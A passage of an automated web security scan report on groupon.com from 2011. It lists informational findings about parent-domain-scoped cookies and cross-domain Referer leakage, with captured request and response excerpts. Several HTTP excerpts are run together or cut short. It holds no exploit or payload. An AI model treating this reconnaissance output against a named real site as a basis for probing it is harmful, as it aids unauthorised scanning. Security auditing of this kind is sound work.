3.13. http://www.groupon.com/pages/api
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/api
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=eda0ddd27c71c40daccaaa9e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:50 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/ _thepoint=c59f438b255f6fb102a5df9007c0345e; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:50 GMT; HttpOnly
Request
GET /pages/api HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: b=eda0ddd27c71c40daccaaa9e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:50 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/ Set-Cookie: _thepoint=c59f438b255f6fb102a5df9007c0345e; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:50 GMT; HttpOnly 43f986276965a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.14. http://www.groupon.com/pages/corporate-gift-cards
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/corporate-gift-cards
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2cc8aa9390dfe883c; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:55 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd26a6fe44aa18c9a4a; domain=.groupon.com; path=/ _thepoint=3c4434f593d2786383e597c692d197f2; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:56 GMT; HttpOnly
Request
GET /pages/corporate-gift-cards HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.5.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2cc8aa9390dfe883c; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:55 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd26a6fe44aa18c9a4a; domain=.groupon.com; path=/ Set-Cookie: _thepoint=3c4434f593d2786383e597c692d197f2; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:56 GMT; HttpOnly 035c008150134".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.15. http://www.groupon.com/pages/groupon-jobs-frameresize
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/groupon-jobs-frameresize
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:_tpref=http%3A%2F%2Fhire.jobvite.com%2FCompanyJobs%2FCareers.aspx%3Fc%3DqcZ9VfwZ%26jvresize%3Dhttp%3A%2F%2Fwww.groupon.com%2Fpages%2Fgroupon-jobs-frameresize; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:00 GMT b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:00 GMT s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/ _thepoint=46ad16a97121726e6fb720f93a27ac9c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:00:00 GMT; HttpOnly
Request
GET /pages/groupon-jobs-frameresize?height=2782 HTTP/1.1/CompanyJobs/Careers.aspx?c=qcZ9VfwZ&jvresize=http://www.groupon.com/pages/groupon-jobs-frameresize/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.16.7.1313841243632; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: _tpref=http%3A%2F%2Fhire.jobvite.com%2FCompanyJobs%2FCareers.aspx%3Fc%3DqcZ9VfwZ%26jvresize%3Dhttp%3A%2F%2Fwww.groupon.com%2Fpages%2Fgroupon-jobs-frameresize; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:00 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:00 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/ Set-Cookie: _thepoint=46ad16a97121726e6fb720f93a27ac9c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:00:00 GMT; HttpOnly 23958c6bb2afd".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.16. http://www.groupon.com/personalize
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/personalize
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:52:36 GMT s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/ _thepoint=29d716aaaba465d2f3049f987a77dc85; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:52:36 GMT; HttpOnly
Request
GET /personalize?fer=1 HTTP/1.1/dallas/;q=0.3.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.2.9.1313841127; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; _tpref=cdn; adchemy_id=; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; spike_landing_url=http%3A%2F%2Fwww.groupon.com%2Fdallas%2F; division=dallas; visited=visit_2
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:52:36 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/ Set-Cookie: _thepoint=29d716aaaba465d2f3049f987a77dc85; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:52:36 GMT; HttpOnly f420943467717"_to_current_division":false,"subscribed_to_current_channel":false,"is_authenticated":false}
3.17. http://www.groupon.com/press
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/press
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd29fea6cee6b39ca7d; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:27 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2edb603e5125278ec; domain=.groupon.com; path=/ _thepoint=59ae6cced5a55f4549b5b6391dde187c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:27 GMT; HttpOnly
Request
GET /press HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.3.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd29fea6cee6b39ca7d; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:27 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2edb603e5125278ec; domain=.groupon.com; path=/ Set-Cookie: _thepoint=59ae6cced5a55f4549b5b6391dde187c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:27 GMT; HttpOnly a39a885430d5a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.18. http://www.groupon.com/subscriptions/new
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/subscriptions/new
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:54:04 GMT s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/ _thepoint=29d716aaaba465d2f3049f987a77dc85; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:54:04 GMT; HttpOnly
Request
GET /subscriptions/new?division_p=dallas HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3-00505695132f; s=cf0d2b32-cb22-11e0-85e8-00505695132f; visited=visit_1; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:54:04 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132f; domain=.groupon.com; path=/ Set-Cookie: _thepoint=29d716aaaba465d2f3049f987a77dc85; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:54:04 GMT; HttpOnly 77d3d62064ebb"/xhtml1/DTD/xhtml1-transitional.dtd">.facebook.com/2008/fbml' xmlns='http://www...[SNIP]...
3.19. http://www.groupon.com/users/forgot_password
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/users/forgot_password
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:21 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/ _thepoint=41ff7cae1d1f5519ee0d9661c0bdf1fd; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:56:21 GMT; HttpOnly
Request
GET /users/forgot_password HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.9.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:21 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/ Set-Cookie: _thepoint=41ff7cae1d1f5519ee0d9661c0bdf1fd; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:56:21 GMT; HttpOnly 308885c322d7e".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.20. http://www.groupon.com/users/send_password_reset
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/users/send_password_reset
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd22df6c7a004d88bb; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:42 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2773edf5e93a17927; domain=.groupon.com; path=/ _thepoint=ea48539c5ccd872c8cf0bdec825095aa; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:01:43 GMT; HttpOnly
Request
POST /users/send_password_reset HTTP/1.1/users/forgot_password-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; _tpref=http%3A%2F%2Fwww.grouponworks.com%2F; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.23.7.1313841295603; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1_token=r1M203F0Ir4AsHf7OkBQViXsP4HUiV7QpXuxNGPWJbQ%3D&user%5Bemail_address%5D=test%40fastdial.net&commit=Submit
Response
HTTP/1.1 200 OK%40fastdial.net; path=/; expires=Fri, 20-Aug-2021 12:01:42 GMTSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd22df6c7a004d88bb; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:42 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2773edf5e93a17927; domain=.groupon.com; path=/ Set-Cookie: _thepoint=ea48539c5ccd872c8cf0bdec825095aa; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:01:43 GMT; HttpOnly a29a9aadcf59d".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
3.21. http://www.groupon.com/widget
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/widget
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2de699e98101a66c5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:52 GMT s=eda0ddd25a670f2213c27794; domain=.groupon.com; path=/ _thepoint=a291b5bb847ace3326a1196bfa6f3e6a; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:53 GMT; HttpOnly
Request
GET /widget HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2de699e98101a66c5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:52 GMT Set-Cookie: s=eda0ddd25a670f2213c27794; domain=.groupon.com; path=/ Set-Cookie: _thepoint=a291b5bb847ace3326a1196bfa6f3e6a; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:53 GMT; HttpOnly 8d9dcab7797d7".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
4. Cross-domain Referer leakage
previous
next
There are 2 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
4.1. http://www.groupon.com/pages/groupon-jobs-frameresize
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/groupon-jobs-frameresize
Issue detail
The page was loaded from a URL containing a query string:http://www.groupon.com/pages/groupon-jobs-frameresize?height=2782 http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/favicon.ico?rnb1Dk6i http://assets1.grouponcdn.com/groupon.ico?Jzth5gNo http://assets1.grouponcdn.com/images/common/footer_phones.png?zWjPOwTp http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js http://assets1.grouponcdn.com/static/stylesheets/app/contents/controller-oexdwfaW.css http://assets1.grouponcdn.com/static/stylesheets/base-HULg4ZMb.css http://feeds.feedburner.com/groupondallas http://www.facebook.com/groupondallas http://www.flickr.com/photos/grouponcorporate/sets http://www.grouponworks.com/ http://www.grouponworks.com/get-featured http://www.grouspawn.com/ http://www.liveoffgroupon.com/ http://www.meetup.com/groupon http://www.twitter.com/groupondallas
Request
GET /pages/groupon-jobs-frameresize?height=2782 HTTP/1.1/CompanyJobs/Careers.aspx?c=qcZ9VfwZ&jvresize=http://www.groupon.com/pages/groupon-jobs-frameresize/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.16.7.1313841243632; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK.jobvite.com%2FCompanyJobs%2FCareers.aspx%3Fc%3DqcZ9VfwZ%26jvresize%3Dhttp%3A%2F%2Fwww.groupon.com%2Fpages%2Fgroupon-jobs-frameresize; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:00 GMT-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:00 GMT-00505695132f; domain=.groupon.com; path=/21726e6fb720f93a27ac9c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:00:00 GMT; HttpOnly23958c6bb2afd".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <link href='http://assets1.grouponcdn.com/favicon.ico?rnb1Dk6i' rel='SHORTCUT ICON' /> ...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... =IE6' http-equiv='X-UA-Compatible' /><link href="http://feeds.feedburner.com/groupondallas" rel="alternate" title="RSS" type="application/rss+xml" /> <link href="http://assets1.grouponcdn.com/static/stylesheets/base-HULg4ZMb.css" media="screen" rel="stylesheet" type="text/css" /> <link href="http://assets1.grouponcdn.com/static/stylesheets/app/contents/controller-oexdwfaW.css" media="screen" rel="stylesheet" type="text/css" /> ...[SNIP]... <link href='http://assets1.grouponcdn.com/groupon.ico?Jzth5gNo' rel='icon' /> ...[SNIP]... <a href="http://www.grouponworks.com"> <span>...[SNIP]... <a href="http://www.grouponworks.com" title="GrouponWorks for your business"> Learn more</a>...[SNIP]... <img alt="Footer_phones" src="http://assets1.grouponcdn.com/images/common/footer_phones.png?zWjPOwTp" /> </a>...[SNIP]... <a href="http://www.grouponworks.com/get-featured"> Run a Deal</a>...[SNIP]... <a href="http://www.liveoffgroupon.com"> Live Off Groupon</a>...[SNIP]... <a href="http://www.grouspawn.com"> Grouspawn</a>...[SNIP]... <a href="http://www.meetup.com/groupon"> Meetups</a>...[SNIP]... <a href="http://www.flickr.com/photos/grouponcorporate/sets"> Share Photos</a>...[SNIP]... <a href="http://www.twitter.com/groupondallas" class="sprite twitter"> Follow Groupon on Twitter</a>...[SNIP]... <a href="http://www.facebook.com/groupondallas" class="sprite facebook"> Follow Groupon on Facebook</a>...[SNIP]... <a href="http://feeds.feedburner.com/groupondallas" class="sprite rss"> Follow Groupon RSS</a>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js" type="text/javascript"> </script>...[SNIP]...
4.2. http://www.groupon.com/subscriptions/new
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/subscriptions/new
Issue detail
The page was loaded from a URL containing a query string:http://www.groupon.com/subscriptions/new?division_p=dallas http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/favicon.ico?rnb1Dk6i http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml http://assets1.grouponcdn.com/images/groupon/landing_pages/headline_3.gif?Ps-G-CLd http://assets1.grouponcdn.com/images/groupon/landing_pages/places_one_last_thing.png?AGAFrLyy http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh http://assets1.grouponcdn.com/images/groupon/landing_pages/step_check.png?RbYxkc8D http://assets1.grouponcdn.com/static/assets/subscriptions-wVnbKY7b.js http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/alerts-IrgXe2LC.js http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/disable_on_submit--rDwJEm-.js http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/multi_steps-opO74hi1.js http://assets1.grouponcdn.com/static/javascripts/common/attribute_reader-RS-sBH34.js http://assets1.grouponcdn.com/static/javascripts/common/cookie-5t3UUKHC.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.sha256-MHjUM5vi.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js http://assets1.grouponcdn.com/static/stylesheets/app/landing/index-zm9BnoJf.css http://assets1.grouponcdn.com/static/stylesheets/app/subscriptions/subscribe_two_steps7-cCc9NasW.css http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=1? http://www.googleadservices.com/pagead/conversion.js http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&script=0
Request
GET /subscriptions/new?division_p=dallas HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3-00505695132f; s=cf0d2b32-cb22-11e0-85e8-00505695132f; visited=visit_1; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:54:04 GMT-00505695132f; domain=.groupon.com; path=/a465d2f3049f987a77dc85; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:54:04 GMT; HttpOnly77d3d62064ebb"/xhtml1/DTD/xhtml1-transitional.dtd">.facebook.com/2008/fbml' xmlns='http://www...[SNIP]... <link href='http://assets1.grouponcdn.com/favicon.ico?rnb1Dk6i' rel='SHORTCUT ICON' /> ...[SNIP]... =IE6' http-equiv='X-UA-Compatible' /><link href="http://assets1.grouponcdn.com/static/stylesheets/app/landing/index-zm9BnoJf.css" media="screen" rel="stylesheet" type="text/css" /> <link href="http://assets1.grouponcdn.com/static/stylesheets/app/subscriptions/subscribe_two_steps7-cCc9NasW.css" media="screen" rel="stylesheet" type="text/css" /> ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=1?" width="1" height="1" frameborder="0"> </iframe>...[SNIP]... <script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"> </script>...[SNIP]... <img alt="?label=u-p3cpox4weq3al15qm&script=0" border="0" height="0" src="http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&script=0" width="1" /> </div>...[SNIP]... <img alt="Save 50% to 90% on Top-Rated Local Deals" class="save_three_steps" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/headline_3.gif?Ps-G-CLd" /> ...[SNIP]... <img alt="Step 1 of 3" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL" /> ...[SNIP]... '><img alt="Confirm_city" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc" /> ...[SNIP]... <img alt="Step 2 of 3" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh" /> ...[SNIP]... '><img alt="Enter_email" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml" /> ...[SNIP]... <img alt="Step 3 of 3" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_check.png?RbYxkc8D" /> ...[SNIP]... '><img alt="Places_one_last_thing" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/places_one_last_thing.png?AGAFrLyy" /> ...[SNIP]... <script 